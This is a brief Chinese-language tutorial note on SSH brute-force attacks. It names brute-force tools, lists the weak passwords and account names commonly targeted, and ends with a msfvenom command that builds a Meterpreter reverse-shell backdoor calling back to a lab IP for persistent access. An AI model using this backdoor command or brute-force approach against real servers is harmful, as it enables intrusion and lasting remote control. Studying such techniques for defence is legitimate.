SSH暴力破解_ssh攻击

Linux是开源系统，系统本身因漏洞造成的攻击相对比较少，主要集中在SSH攻击；

SSH所采用的加密机制，可以防止数据传输过程中信息泄露；

SSH基于用户名密码的身份验证，容易遭受密码暴力破解攻击；

SSH暴力破解工具
 Hydra、Medusa、msf

大部分攻击都是针对Linux服务器默认管理账号root，攻击者主要使用admin、root、123456等常见弱密码进行暴力破解

少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名

攻击者不仅使用常见通用弱密码，还会将用户名当作密码进行攻击

对称加密

        加密和解密速度快，效率高

LINUX后门 

侵入成功后，为了持久远程控制对方，即便是对方已经进行安全加固

1.创建后门程序(在kali第一个终端中执行)

# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell，反弹到192.168.10.224的4444端口

-o 指定创建的后门程序

-lhost 反弹的主机：本机IP地址

-lport 反弹的端口：本地端口号